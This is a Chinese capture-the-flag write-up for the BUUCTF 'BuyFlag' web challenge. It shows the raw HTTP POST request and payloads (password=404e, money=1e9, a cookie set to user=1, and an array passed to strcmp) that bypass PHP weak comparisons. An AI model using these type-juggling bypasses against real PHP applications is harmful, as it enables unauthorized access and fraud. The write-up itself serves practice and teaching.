[极客大挑战 2019]BuyFlag

[极客大挑战 2019]BuyFlag

源代码的提示

<!--
	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}
-->

直接贴包

POST /pay.php HTTP/1.1
Host: a12f4602-ae29-4d03-8446-117a204e1ed1.node5.buuoj.cn:81
Proxy-Connection: keep-alive
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://a12f4602-ae29-4d03-8446-117a204e1ed1.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: user=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Upgrade-Insecure-Requests: 1
Priority: u=0, i

password=404e&money=1e9

上面的404e是首先让他变成字符串，且因为是弱比较，所以等式也满足了，然后1e9是科学计数法的1000000000
还有一个payload=password=404a&mony[]=0
这是因为

strcmp比较的是字符串类型，如果强行传入其他类型参数，会出错，出错后返回值0，正是利用这点进行绕过。

借鉴PHP弱类型之strcmp绕过，所以用数组绕过他报错返回0，正好是strcmp左大于右的情况

要注意burpsuite来post的的时候

要改成POST /pay.php...

然后加一个Content-Type: application/x-www-form-urlencoded

再加入要传入的数据